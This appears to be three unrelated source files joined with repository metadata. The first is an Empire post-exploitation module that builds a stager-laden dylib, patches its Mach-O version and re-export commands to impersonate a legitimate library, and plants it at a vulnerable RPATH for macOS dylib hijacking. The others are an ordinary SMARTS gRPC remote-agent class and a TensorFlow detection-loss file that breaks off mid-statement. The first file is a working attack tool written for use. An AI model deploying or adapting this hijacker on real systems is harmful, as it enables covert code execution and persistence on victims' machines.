9f519bc45b3b5a203f77d8c00b07499157c307ad
[ "BSD-3-Clause" ]
47
2017-04-04T18:25:37.000Z
2021-09-27T22:48:35.000Z
import base64 class Module: def __init__(self, mainMenu, params=[]): # metadata info about the module, not modified during runtime self.info = { # name for the module that will appear in module menus 'Name': 'CreateDylibHijacker', # list of one or more authors for the module 'Author': ['@patrickwardle,@xorrior'], # more verbose multi-line description of the module 'Description': ('Configures and Empire dylib for use in a Dylib hijack, given the path to a legitimate dylib of a vulnerable application. The architecture of the dylib must match the target application. The configured dylib will be copied local to the hijackerPath'), # True if the module needs to run in the background 'Background' : False, # File extension to save the file as 'OutputExtension' : "", 'NeedsAdmin' : True, # True if the method doesn't touch disk/is reasonably opsec safe 'OpsecSafe' : False, # the module language 'Language' : 'python', # the minimum language version needed 'MinLanguageVersion' : '2.6', # list of any references/other comments 'Comments': [ 'comment', 'https://www.virusbulletin.com/virusbulletin/2015/03/dylib-hijacking-os-x' ] } # any options needed by the module, settable during runtime self.options = { # format: # value_name : {description, required, default_value} 'Agent' : { # The 'Agent' option is the only one that MUST be in a module 'Description' : 'Agent to execute module on.', 'Required' : True, 'Value' : '' }, 'Listener' : { 'Description' : 'Listener to use.', 'Required' : True, 'Value' : '' }, 'Arch' : { 'Description' : 'Arch: x86/x64', 'Required' : True, 'Value' : 'x86' }, 'SafeChecks' : { 'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.', 'Required' : True, 'Value' : 'True' }, 'UserAgent' : { 'Description' : 'User-agent string to use for the staging request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'LegitimateDylibPath' : { 'Description' : 'Full path to the legitimate dylib of the vulnerable application', 'Required' : True, 'Value' : '' }, 'VulnerableRPATH' : { 'Description' : 'Full path to where the hijacker should be planted. This will be the RPATH in the Hijack Scanner module.', 'Required' : True, 'Value' : '' } } # save off a copy of the mainMenu object to access external functionality # like listeners/agent handlers/etc. self.mainMenu = mainMenu # During instantiation, any settable option parameters # are passed as an object set to the module and the # options dictionary is automatically set. This is mostly # in case options are passed on the command line if params: for param in params: # parameter format is [Name, Value] option, value = param if option in self.options: self.options[option]['Value'] = value def generate(self, obfuscate=False, obfuscationCommand=""): # the Python script itself, with the command to invoke # for execution appended to the end. Scripts should output # everything to the pipeline for proper parsing. # # the script should be stripped of comments, with a link to any # original reference script included in the comments. listenerName = self.options['Listener']['Value'] userAgent = self.options['UserAgent']['Value'] safeChecks = self.options['SafeChecks']['Value'] arch = self.options['Arch']['Value'] launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', userAgent=userAgent, safeChecks=safeChecks) launcher = launcher.strip('echo').strip(' | python &').strip("\"") dylibBytes = self.mainMenu.stagers.generate_dylib(launcherCode=launcher, arch=arch, hijacker='true') encodedDylib = base64.b64encode(dylibBytes) dylib = self.options['LegitimateDylibPath']['Value'] vrpath = self.options['VulnerableRPATH']['Value'] script = """ from ctypes import * def run(attackerDYLIB): import ctypes import io import os import sys import fcntl import shutil import struct import stat LC_REQ_DYLD = 0x80000000 LC_LOAD_WEAK_DYLIB = LC_REQ_DYLD | 0x18 LC_RPATH = (0x1c | LC_REQ_DYLD) LC_REEXPORT_DYLIB = 0x1f | LC_REQ_DYLD ( LC_SEGMENT, LC_SYMTAB, LC_SYMSEG, LC_THREAD, LC_UNIXTHREAD, LC_LOADFVMLIB, LC_IDFVMLIB, LC_IDENT, LC_FVMFILE, LC_PREPAGE, LC_DYSYMTAB, LC_LOAD_DYLIB, LC_ID_DYLIB, LC_LOAD_DYLINKER, LC_ID_DYLINKER, LC_PREBOUND_DYLIB, LC_ROUTINES, LC_SUB_FRAMEWORK, LC_SUB_UMBRELLA, LC_SUB_CLIENT, LC_SUB_LIBRARY, LC_TWOLEVEL_HINTS, LC_PREBIND_CKSUM ) = range(0x1, 0x18) MH_MAGIC = 0xfeedface MH_CIGAM = 0xcefaedfe MH_MAGIC_64 = 0xfeedfacf MH_CIGAM_64 = 0xcffaedfe _CPU_ARCH_ABI64 = 0x01000000 CPU_TYPE_NAMES = { -1: 'ANY', 1: 'VAX', 6: 'MC680x0', 7: 'i386', _CPU_ARCH_ABI64 | 7: 'x86_64', 8: 'MIPS', 10: 'MC98000', 11: 'HPPA', 12: 'ARM', 13: 'MC88000', 14: 'SPARC', 15: 'i860', 16: 'Alpha', 18: 'PowerPC', _CPU_ARCH_ABI64 | 18: 'PowerPC64', } #structs that we need class mach_header(ctypes.Structure): _fields_ = [ ("magic", ctypes.c_uint), ("cputype", ctypes.c_uint), ("cpusubtype", ctypes.c_uint), ("filetype", ctypes.c_uint), ("ncmds", ctypes.c_uint), ("sizeofcmds", ctypes.c_uint), ("flags", ctypes.c_uint) ] class mach_header_64(ctypes.Structure): _fields_ = mach_header._fields_ + [('reserved',ctypes.c_uint)] class load_command(ctypes.Structure): _fields_ = [ ("cmd", ctypes.c_uint), ("cmdsize", ctypes.c_uint) ] LC_HEADER_SIZE = 0x8 def checkPrereqs(attackerDYLIB, targetDYLIB): if not os.path.exists(attackerDYLIB): print 'ERROR: dylib \\'%%s\\' not found' %% (attackerDYLIB) return False if not os.path.exists(targetDYLIB): print 'ERROR: dylib \\'%%s\\' not found' %% (targetDYLIB) return False attacker = open(attackerDYLIB) target = open(targetDYLIB) attackerHeader = mach_header.from_buffer_copy(attacker.read(28)) targetHeader = mach_header.from_buffer_copy(target.read(28)) if attackerHeader.cputype != targetHeader.cputype: print 'ERROR: Architecture mismatch' attacker.close() target.close() return False return True def findLoadCommand(fileHandle, targetLoadCommand): MACHHEADERSZ64 = 32 MACHHEADERSZ = 28 matchedOffsets = [] #wrap try: header = mach_header.from_buffer_copy(fileHandle.read(MACHHEADERSZ)) if header.magic == MH_MAGIC_64: fileHandle.seek(0, io.SEEK_SET) header = mach_header_64.from_buffer_copy(fileHandle.read(MACHHEADERSZ64)) ncmds = header.ncmds # Get to the load commands current = fileHandle.tell() #save offset to load command for cmd in range(ncmds): offset = current lc = load_command.from_buffer_copy(fileHandle.read(LC_HEADER_SIZE)) size = lc.cmdsize if lc.cmd == targetLoadCommand: matchedOffsets.append(offset) fileHandle.seek(size - LC_HEADER_SIZE, io.SEEK_CUR) current = fileHandle.tell() #exceptions except Exception, e: #err msg print 'EXCEPTION (finding load commands): %%s' %% e #reset matchedOffsets = None return matchedOffsets #configure version info # 1) find/extract version info from target .dylib # 2) find/update version info from hijacker .dylib to match target .dylib def configureVersions(attackerDYLIB, targetDYLIB): #wrap try: #dbg msg print ' [+] parsing \\'%%s\\' to extract version info' %% (os.path.split(targetDYLIB)[1]) #open target .dylib fileHandle = open(targetDYLIB, 'rb') #find LC_ID_DYLIB load command # ->and check versionOffsets = findLoadCommand(fileHandle, LC_ID_DYLIB) if not versionOffsets or not len(versionOffsets): #err msg print 'ERROR: failed to find \\'LC_ID_DYLIB\\' load command in %%s' %% (os.path.split(targetDYLIB)[1]) #bail return False #dbg msg print ' found \\'LC_ID_DYLIB\\' load command at offset(s): %%s' %% (versionOffsets) #seek to offset of LC_ID_DYLIB fileHandle.seek(versionOffsets[0], io.SEEK_SET) #seek to skip over LC header and timestamp fileHandle.seek(LC_HEADER_SIZE+0x8, io.SEEK_CUR) ''' struct dylib { union lc_str name; uint_32 timestamp; uint_32 current_version; uint_32 compatibility_version; }; ''' #extract current version currentVersion = fileHandle.read(4) #extract compatibility version compatibilityVersion = fileHandle.read(4) #dbg msg(s) print ' extracted current version: 0x%%x' %% (struct.unpack('<L', currentVersion)[0]) print ' extracted compatibility version: 0x%%x' %% (struct.unpack('<L', compatibilityVersion)[0]) #close fileHandle.close() #dbg msg print ' [+] parsing \\'%%s\\' to find version info' %% (os.path.split(attackerDYLIB)[1]) #open target .dylib fileHandle = open(attackerDYLIB, 'rb+') #find LC_ID_DYLIB load command # ->and check versionOffsets = findLoadCommand(fileHandle, LC_ID_DYLIB) if not versionOffsets or not len(versionOffsets): #err msg print 'ERROR: failed to find \\'LC_ID_DYLIB\\' load command in %%s' %% (os.path.split(attackerDYLIB)[1]) #bail return False #dbg msg(s) print ' found \\'LC_ID_DYLIB\\' load command at offset(s): %%s' %% (versionOffsets) print ' [+] updating version info in %%s to match %%s' %% ((os.path.split(attackerDYLIB)[1]), (os.path.split(targetDYLIB)[1])) #update version info for versionOffset in versionOffsets: #seek to offset of LC_ID_DYLIB fileHandle.seek(versionOffset, io.SEEK_SET) #seek to skip over LC header and timestamp fileHandle.seek(LC_HEADER_SIZE+0x8, io.SEEK_CUR) #dbg msg print 'setting version info at offset %%s' %% (versionOffset) #set current version fileHandle.write(currentVersion) #set compatability version fileHandle.write(compatibilityVersion) #close fileHandle.close() except Exception, e: #err msg print 'EXCEPTION (configuring version info): %%s' %% e return True #configure re-export # ->update hijacker .dylib to re-export everything to target .dylib def configureReExport(attackerDYLIB, targetDYLIB): #wrap try: #dbg msg print ' [+] parsing \\'%%s\\' to extract faux re-export info' %% (os.path.split(attackerDYLIB)[1]) #open attacker's .dylib fileHandle = open(attackerDYLIB, 'rb+') #find LC_REEXPORT_DYLIB load command # ->and check reExportOffsets = findLoadCommand(fileHandle, LC_REEXPORT_DYLIB) if not reExportOffsets or not len(reExportOffsets): #err msg print 'ERROR: failed to find \\'LC_REEXPORT_DYLIB\\' load command in %%s' %% (os.path.split(attackerDYLIB)[1]) #bail return False #dbg msg print ' found \\'LC_REEXPORT_DYLIB\\' load command at offset(s): %%s' %% (reExportOffsets) ''' struct dylib { union lc_str name; uint_32 timestamp; uint_32 current_version; uint_32 compatibility_version; }; ''' #update re-export info #TODO: does the current and compat version need to match? we can easily set it for reExportOffset in reExportOffsets: #seek to offset of LC_REEXPORT_DYLIB fileHandle.seek(reExportOffset, io.SEEK_SET) #seek to skip over command fileHandle.seek(0x4, io.SEEK_CUR) #read in size of load command commandSize = struct.unpack('<L', fileHandle.read(4))[0] #dbg msg print ' extracted LC command size: 0x%%x' %% (commandSize) #read in path offset pathOffset = struct.unpack('<L', fileHandle.read(4))[0] #dbg msg print ' extracted path offset: 0x%%x' %% (pathOffset) #seek to path offset fileHandle.seek(reExportOffset + pathOffset, io.SEEK_SET) #calc length of path # it makes up rest of load command data pathSize = commandSize - (fileHandle.tell() - reExportOffset) #dbg msg print ' computed path size: 0x%%x' %% (pathSize) #read out path data = targetDYLIB + '\\0' * (pathSize - len(targetDYLIB)) fileHandle.write(data) #path can include NULLs so lets chop those off #path = path.rstrip('\0') #dbg msg(s) #print ' extracted faux path: %%s' %% (path) #close fileHandle.close() #dbg msg print ' [+] updated embedded re-export' #wrap #handle exceptions except Exception, e: #err msg print 'EXCEPTION (configuring re-exports): %%s' %% e #bail return False return True def configure(attackerDYLIB, targetDYLIB): #configure version info # ->update attacker's .dylib to match target .dylib's version info if not configureVersions(attackerDYLIB, targetDYLIB): #err msg print 'ERROR: failed to configure version info' #bail return False #configure re-export # ->update attacker's .dylib to re-export everything to target .dylib if not configureReExport(attackerDYLIB, targetDYLIB): #err msg print 'ERROR: failed to configure re-export' #bail return False return True #target .dylib targetDYLIB = "%s" vrpath = "%s" #configured .dylib configuredDYLIB = "" #init output path for configured .dylib configuredDYLIB = os.path.split(attackerDYLIB)[0]+'/' + os.path.split(targetDYLIB)[1] #dbg msg print ' [+] configuring %%s to hijack %%s' %% (os.path.split(attackerDYLIB)[1], os.path.split(targetDYLIB)[1]) #check prereqs # ->i.e. sanity checks if not checkPrereqs(attackerDYLIB, targetDYLIB): #err msg print 'ERROR: prerequisite check failed\\n' #bail return "" #configure the provide .dylib if not configure(attackerDYLIB, targetDYLIB): #err msg print 'ERROR: failed to configure %%s\\n' %% (os.path.split(targetDYLIB)[1]) #bail return "" #dbg msg print ' [+] copying configured .dylib to %%s' %% (configuredDYLIB) #make a (local) copy w/ name shutil.copy2(attackerDYLIB, configuredDYLIB) os.remove(attackerDYLIB) if not os.path.exists(os.path.split(vrpath)[0]): os.makedirs(os.path.split(vrpath)[0]) os.chmod(configuredDYLIB, 0777) shutil.copy2(configuredDYLIB, vrpath) os.remove(configuredDYLIB) #dbg msg print '\\nHijacker created, renamed to %%s, and copied to %%s' %% (configuredDYLIB,vrpath) import base64 import uuid encbytes = "%s" filename = str(uuid.uuid4()) path = "/tmp/" + filename + ".dylib" decodedDylib = base64.b64decode(encbytes) temp = open(path,'wb') temp.write(decodedDylib) temp.close() run(path) """ % (dylib,vrpath,encodedDylib) return script
32.180505
279
0.558728
991ba12b1c0cde1e4c18f108f09a865fe803c415
4,576
py
Python
smarts/core/remote_agent.py
zbzhu99/SMARTS
652aa23e71bd4e2732e2742140cfcd0ec082a7da
[ "MIT" ]
null
null
null
smarts/core/remote_agent.py
zbzhu99/SMARTS
652aa23e71bd4e2732e2742140cfcd0ec082a7da
[ "MIT" ]
null
null
null
smarts/core/remote_agent.py
zbzhu99/SMARTS
652aa23e71bd4e2732e2742140cfcd0ec082a7da
[ "MIT" ]
null
null
null
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. import logging import time from concurrent import futures from typing import Tuple import cloudpickle import grpc from smarts.core.agent import AgentSpec from smarts.zoo import manager_pb2, manager_pb2_grpc, worker_pb2, worker_pb2_grpc class RemoteAgentException(Exception): """An exception describing issues relating to maintaining connection with a remote agent.""" pass class RemoteAgent: """A remotely controlled agent.""" def __init__( self, manager_address: Tuple[str, int], worker_address: Tuple[str, int], timeout: float = 10, ): """Executes an agent in a worker (i.e., a gRPC server). Args: manager_address (Tuple[str,int]): Manager's server address (ip, port). worker_address (Tuple[str,int]): Worker's server address (ip, port). timeout (float, optional): Time (seconds) to wait for startup or response from server. Defaults to 10. Raises: RemoteAgentException: If timeout occurs while connecting to the manager or worker. """ self._log = logging.getLogger(self.__class__.__name__) # Track the last action future. self._act_future = None self._manager_channel = grpc.insecure_channel( f"{manager_address[0]}:{manager_address[1]}" ) self._worker_address = worker_address self._worker_channel = grpc.insecure_channel( f"{worker_address[0]}:{worker_address[1]}" ) try: # Wait until the grpc server is ready or timeout seconds. grpc.channel_ready_future(self._manager_channel).result(timeout=timeout) grpc.channel_ready_future(self._worker_channel).result(timeout=timeout) except grpc.FutureTimeoutError as e: raise RemoteAgentException( "Timeout while connecting to remote worker process." ) from e self._manager_stub = manager_pb2_grpc.ManagerStub(self._manager_channel) self._worker_stub = worker_pb2_grpc.WorkerStub(self._worker_channel) def act(self, obs): """Call the agent's act function asynchronously and return a Future.""" self._act_future = self._worker_stub.act.future( worker_pb2.Observation(payload=cloudpickle.dumps(obs)) ) return self._act_future def start(self, agent_spec: AgentSpec): """Send the AgentSpec to the agent runner.""" # Cloudpickle used only for the agent_spec to allow for serialization of lambdas. self._worker_stub.build( worker_pb2.Specification(payload=cloudpickle.dumps(agent_spec)) ) def terminate(self): """Close the agent connection and invalidate this agent.""" # If the last action future returned is incomplete, cancel it first. if (self._act_future is not None) and (not self._act_future.done()): self._act_future.cancel() try: # Stop the remote worker process self._manager_stub.stop_worker( manager_pb2.Port(num=self._worker_address[1]) ) # Close manager channel self._manager_channel.close() except grpc.RpcError as e: if e.code() == grpc.StatusCode.UNAVAILABLE: # Do nothing as RPC server has been terminated. pass else: raise e
39.791304
96
0.676136
767ad8c1fb199395d7adcc0eed8ac61081bbe743
23,017
py
Python
mobile_deployment/tensorflow/slim/models/official/vision/detection/modeling/losses.py
zhoudaquan/rethinking_bottleneck_structure_code_release
195ee737952e2f8d729a14b51651748caf35794c
[ "BSD-3-Clause-Clear" ]
153
2020-10-25T13:58:04.000Z
2022-03-07T06:01:54.000Z
official/vision/detection/modeling/losses.py
MissMonster/models
5a68ac6245993ae351f6b9aca6b22d38cc4bdda1
[ "Apache-2.0" ]
11
2020-07-13T08:29:00.000Z
2022-03-24T07:21:09.000Z
official/vision/detection/modeling/losses.py
MissMonster/models
5a68ac6245993ae351f6b9aca6b22d38cc4bdda1
[ "Apache-2.0" ]
23
2020-10-25T14:44:47.000Z
2021-03-31T02:12:13.000Z
# Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Losses used for detection models.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from absl import logging import tensorflow as tf def focal_loss(logits, targets, alpha, gamma, normalizer): """Compute the focal loss between `logits` and the golden `target` values. Focal loss = -(1-pt)^gamma * log(pt) where pt is the probability of being classified to the true class. Args: logits: A float32 tensor of size [batch, height_in, width_in, num_predictions]. targets: A float32 tensor of size [batch, height_in, width_in, num_predictions]. alpha: A float32 scalar multiplying alpha to the loss from positive examples and (1-alpha) to the loss from negative examples. gamma: A float32 scalar modulating loss from hard and easy examples. normalizer: A float32 scalar normalizes the total loss from all examples. Returns: loss: A float32 Tensor of size [batch, height_in, width_in, num_predictions] representing normalized loss on the prediction map. """ with tf.name_scope('focal_loss'): positive_label_mask = tf.math.equal(targets, 1.0) cross_entropy = ( tf.nn.sigmoid_cross_entropy_with_logits(labels=targets, logits=logits)) # Below are comments/derivations for computing modulator. # For brevity, let x = logits, z = targets, r = gamma, and p_t = sigmod(x) # for positive samples and 1 - sigmoid(x) for negative examples. # # The modulator, defined as (1 - P_t)^r, is a critical part in focal loss # computation. For r > 0, it puts more weights on hard examples, and less # weights on easier ones. However if it is directly computed as (1 - P_t)^r, # its back-propagation is not stable when r < 1. The implementation here # resolves the issue. # # For positive samples (labels being 1), # (1 - p_t)^r # = (1 - sigmoid(x))^r # = (1 - (1 / (1 + exp(-x))))^r # = (exp(-x) / (1 + exp(-x)))^r # = exp(log((exp(-x) / (1 + exp(-x)))^r)) # = exp(r * log(exp(-x)) - r * log(1 + exp(-x))) # = exp(- r * x - r * log(1 + exp(-x))) # # For negative samples (labels being 0), # (1 - p_t)^r # = (sigmoid(x))^r # = (1 / (1 + exp(-x)))^r # = exp(log((1 / (1 + exp(-x)))^r)) # = exp(-r * log(1 + exp(-x))) # # Therefore one unified form for positive (z = 1) and negative (z = 0) # samples is: # (1 - p_t)^r = exp(-r * z * x - r * log(1 + exp(-x))). neg_logits = -1.0 * logits modulator = tf.math.exp(gamma * targets * neg_logits - gamma * tf.math.log1p(tf.math.exp(neg_logits))) loss = modulator * cross_entropy weighted_loss = tf.where(positive_label_mask, alpha * loss, (1.0 - alpha) * loss) weighted_loss /= normalizer return weighted_loss class RpnScoreLoss(object): """Region Proposal Network score loss function.""" def __init__(self, params): self._rpn_batch_size_per_im = params.rpn_batch_size_per_im self._binary_crossentropy = tf.keras.losses.BinaryCrossentropy( reduction=tf.keras.losses.Reduction.SUM, from_logits=True) def __call__(self, score_outputs, labels): """Computes total RPN detection loss. Computes total RPN detection loss including box and score from all levels. Args: score_outputs: an OrderDict with keys representing levels and values representing scores in [batch_size, height, width, num_anchors]. labels: the dictionary that returned from dataloader that includes groundturth targets. Returns: rpn_score_loss: a scalar tensor representing total score loss. """ with tf.name_scope('rpn_loss'): levels = sorted(score_outputs.keys()) score_losses = [] for level in levels: score_losses.append( self._rpn_score_loss( score_outputs[level], labels[level], normalizer=tf.cast( tf.shape(score_outputs[level])[0] * self._rpn_batch_size_per_im, dtype=tf.float32))) # Sums per level losses to total loss. return tf.math.add_n(score_losses) def _rpn_score_loss(self, score_outputs, score_targets, normalizer=1.0): """Computes score loss.""" # score_targets has three values: # (1) score_targets[i]=1, the anchor is a positive sample. # (2) score_targets[i]=0, negative. # (3) score_targets[i]=-1, the anchor is don't care (ignore). with tf.name_scope('rpn_score_loss'): mask = tf.math.logical_or(tf.math.equal(score_targets, 1), tf.math.equal(score_targets, 0)) score_targets = tf.math.maximum(score_targets, tf.zeros_like(score_targets)) score_targets = tf.expand_dims(score_targets, axis=-1) score_outputs = tf.expand_dims(score_outputs, axis=-1) score_loss = self._binary_crossentropy( score_targets, score_outputs, sample_weight=mask) score_loss /= normalizer return score_loss class RpnBoxLoss(object): """Region Proposal Network box regression loss function.""" def __init__(self, params): logging.info('RpnBoxLoss huber_loss_delta %s', params.huber_loss_delta) # The delta is typically around the mean value of regression target. # for instances, the regression targets of 512x512 input with 6 anchors on # P2-P6 pyramid is about [0.1, 0.1, 0.2, 0.2]. self._huber_loss = tf.keras.losses.Huber( delta=params.huber_loss_delta, reduction=tf.keras.losses.Reduction.SUM) def __call__(self, box_outputs, labels): """Computes total RPN detection loss. Computes total RPN detection loss including box and score from all levels. Args: box_outputs: an OrderDict with keys representing levels and values representing box regression targets in [batch_size, height, width, num_anchors * 4]. labels: the dictionary that returned from dataloader that includes groundturth targets. Returns: rpn_box_loss: a scalar tensor representing total box regression loss. """ with tf.name_scope('rpn_loss'): levels = sorted(box_outputs.keys()) box_losses = [] for level in levels: box_losses.append(self._rpn_box_loss(box_outputs[level], labels[level])) # Sum per level losses to total loss. return tf.add_n(box_losses) def _rpn_box_loss(self, box_outputs, box_targets, normalizer=1.0): """Computes box regression loss.""" with tf.name_scope('rpn_box_loss'): mask = tf.cast(tf.not_equal(box_targets, 0.0), dtype=tf.float32) box_targets = tf.expand_dims(box_targets, axis=-1) box_outputs = tf.expand_dims(box_outputs, axis=-1) box_loss = self._huber_loss(box_targets, box_outputs, sample_weight=mask) # The loss is normalized by the sum of non-zero weights and additional # normalizer provided by the function caller. Using + 0.01 here to avoid # division by zero. box_loss /= normalizer * (tf.reduce_sum(mask) + 0.01) return box_loss class FastrcnnClassLoss(object): """Fast R-CNN classification loss function.""" def __init__(self): self._categorical_crossentropy = tf.keras.losses.CategoricalCrossentropy( reduction=tf.keras.losses.Reduction.SUM, from_logits=True) def __call__(self, class_outputs, class_targets): """Computes the class loss (Fast-RCNN branch) of Mask-RCNN. This function implements the classification loss of the Fast-RCNN. The classification loss is softmax on all RoIs. Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/modeling/fast_rcnn_heads.py # pylint: disable=line-too-long Args: class_outputs: a float tensor representing the class prediction for each box with a shape of [batch_size, num_boxes, num_classes]. class_targets: a float tensor representing the class label for each box with a shape of [batch_size, num_boxes]. Returns: a scalar tensor representing total class loss. """ with tf.name_scope('fast_rcnn_loss'): batch_size, num_boxes, num_classes = class_outputs.get_shape().as_list() class_targets = tf.cast(class_targets, dtype=tf.int32) class_targets_one_hot = tf.one_hot(class_targets, num_classes) return self._fast_rcnn_class_loss(class_outputs, class_targets_one_hot, normalizer=batch_size * num_boxes / 2.0) def _fast_rcnn_class_loss(self, class_outputs, class_targets_one_hot, normalizer): """Computes classification loss.""" with tf.name_scope('fast_rcnn_class_loss'): class_loss = self._categorical_crossentropy(class_targets_one_hot, class_outputs) class_loss /= normalizer return class_loss class FastrcnnBoxLoss(object): """Fast R-CNN box regression loss function.""" def __init__(self, params): logging.info('FastrcnnBoxLoss huber_loss_delta %s', params.huber_loss_delta) # The delta is typically around the mean value of regression target. # for instances, the regression targets of 512x512 input with 6 anchors on # P2-P6 pyramid is about [0.1, 0.1, 0.2, 0.2]. self._huber_loss = tf.keras.losses.Huber( delta=params.huber_loss_delta, reduction=tf.keras.losses.Reduction.SUM) def __call__(self, box_outputs, class_targets, box_targets): """Computes the box loss (Fast-RCNN branch) of Mask-RCNN. This function implements the box regression loss of the Fast-RCNN. As the `box_outputs` produces `num_classes` boxes for each RoI, the reference model expands `box_targets` to match the shape of `box_outputs` and selects only the target that the RoI has a maximum overlap. (Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/roi_data/fast_rcnn.py) # pylint: disable=line-too-long Instead, this function selects the `box_outputs` by the `class_targets` so that it doesn't expand `box_targets`. The box loss is smooth L1-loss on only positive samples of RoIs. Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/modeling/fast_rcnn_heads.py # pylint: disable=line-too-long Args: box_outputs: a float tensor representing the box prediction for each box with a shape of [batch_size, num_boxes, num_classes * 4]. class_targets: a float tensor representing the class label for each box with a shape of [batch_size, num_boxes]. box_targets: a float tensor representing the box label for each box with a shape of [batch_size, num_boxes, 4]. Returns: box_loss: a scalar tensor representing total box regression loss. """ with tf.name_scope('fast_rcnn_loss'): class_targets = tf.cast(class_targets, dtype=tf.int32) # Selects the box from `box_outputs` based on `class_targets`, with which # the box has the maximum overlap. (batch_size, num_rois, num_class_specific_boxes) = box_outputs.get_shape().as_list() num_classes = num_class_specific_boxes // 4 box_outputs = tf.reshape(box_outputs, [batch_size, num_rois, num_classes, 4]) box_indices = tf.reshape( class_targets + tf.tile( tf.expand_dims( tf.range(batch_size) * num_rois * num_classes, 1), [1, num_rois]) + tf.tile( tf.expand_dims(tf.range(num_rois) * num_classes, 0), [batch_size, 1]), [-1]) box_outputs = tf.matmul( tf.one_hot( box_indices, batch_size * num_rois * num_classes, dtype=box_outputs.dtype), tf.reshape(box_outputs, [-1, 4])) box_outputs = tf.reshape(box_outputs, [batch_size, -1, 4]) return self._fast_rcnn_box_loss(box_outputs, box_targets, class_targets) def _fast_rcnn_box_loss(self, box_outputs, box_targets, class_targets, normalizer=1.0): """Computes box regression loss.""" with tf.name_scope('fast_rcnn_box_loss'): mask = tf.tile(tf.expand_dims(tf.greater(class_targets, 0), axis=2), [1, 1, 4]) mask = tf.cast(mask, dtype=tf.float32) box_targets = tf.expand_dims(box_targets, axis=-1) box_outputs = tf.expand_dims(box_outputs, axis=-1) box_loss = self._huber_loss(box_targets, box_outputs, sample_weight=mask) # The loss is normalized by the number of ones in mask, # additianal normalizer provided by the user and using 0.01 here to avoid # division by 0. box_loss /= normalizer * (tf.reduce_sum(mask) + 0.01) return box_loss class MaskrcnnLoss(object): """Mask R-CNN instance segmentation mask loss function.""" def __init__(self): self._binary_crossentropy = tf.keras.losses.BinaryCrossentropy( reduction=tf.keras.losses.Reduction.SUM, from_logits=True) def __call__(self, mask_outputs, mask_targets, select_class_targets): """Computes the mask loss of Mask-RCNN. This function implements the mask loss of Mask-RCNN. As the `mask_outputs` produces `num_classes` masks for each RoI, the reference model expands `mask_targets` to match the shape of `mask_outputs` and selects only the target that the RoI has a maximum overlap. (Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/roi_data/mask_rcnn.py) # pylint: disable=line-too-long Instead, this implementation selects the `mask_outputs` by the `class_targets` so that it doesn't expand `mask_targets`. Note that the selection logic is done in the post-processing of mask_rcnn_fn in mask_rcnn_architecture.py. Args: mask_outputs: a float tensor representing the prediction for each mask, with a shape of [batch_size, num_masks, mask_height, mask_width]. mask_targets: a float tensor representing the binary mask of ground truth labels for each mask with a shape of [batch_size, num_masks, mask_height, mask_width]. select_class_targets: a tensor with a shape of [batch_size, num_masks], representing the foreground mask targets. Returns: mask_loss: a float tensor representing total mask loss. """ with tf.name_scope('mask_rcnn_loss'): (batch_size, num_masks, mask_height, mask_width) = mask_outputs.get_shape().as_list() weights = tf.tile( tf.reshape(tf.greater(select_class_targets, 0), [batch_size, num_masks, 1, 1]), [1, 1, mask_height, mask_width]) weights = tf.cast(weights, dtype=tf.float32) mask_targets = tf.expand_dims(mask_targets, axis=-1) mask_outputs = tf.expand_dims(mask_outputs, axis=-1) mask_loss = self._binary_crossentropy(mask_targets, mask_outputs, sample_weight=weights) # The loss is normalized by the number of 1's in weights and # + 0.01 is used to avoid division by zero. return mask_loss / (tf.reduce_sum(weights) + 0.01) class RetinanetClassLoss(object): """RetinaNet class loss.""" def __init__(self, params, num_classes): self._num_classes = num_classes self._focal_loss_alpha = params.focal_loss_alpha self._focal_loss_gamma = params.focal_loss_gamma def __call__(self, cls_outputs, labels, num_positives): """Computes total detection loss. Computes total detection loss including box and class loss from all levels. Args: cls_outputs: an OrderDict with keys representing levels and values representing logits in [batch_size, height, width, num_anchors * num_classes]. labels: the dictionary that returned from dataloader that includes class groundturth targets. num_positives: number of positive examples in the minibatch. Returns: an integar tensor representing total class loss. """ # Sums all positives in a batch for normalization and avoids zero # num_positives_sum, which would lead to inf loss during training num_positives_sum = tf.reduce_sum(input_tensor=num_positives) + 1.0 cls_losses = [] for level in cls_outputs.keys(): cls_losses.append(self.class_loss( cls_outputs[level], labels[level], num_positives_sum)) # Sums per level losses to total loss. return tf.add_n(cls_losses) def class_loss(self, cls_outputs, cls_targets, num_positives, ignore_label=-2): """Computes RetinaNet classification loss.""" # Onehot encoding for classification labels. cls_targets_one_hot = tf.one_hot(cls_targets, self._num_classes) bs, height, width, _, _ = cls_targets_one_hot.get_shape().as_list() cls_targets_one_hot = tf.reshape(cls_targets_one_hot, [bs, height, width, -1]) loss = focal_loss(cls_outputs, cls_targets_one_hot, self._focal_loss_alpha, self._focal_loss_gamma, num_positives) ignore_loss = tf.where( tf.equal(cls_targets, 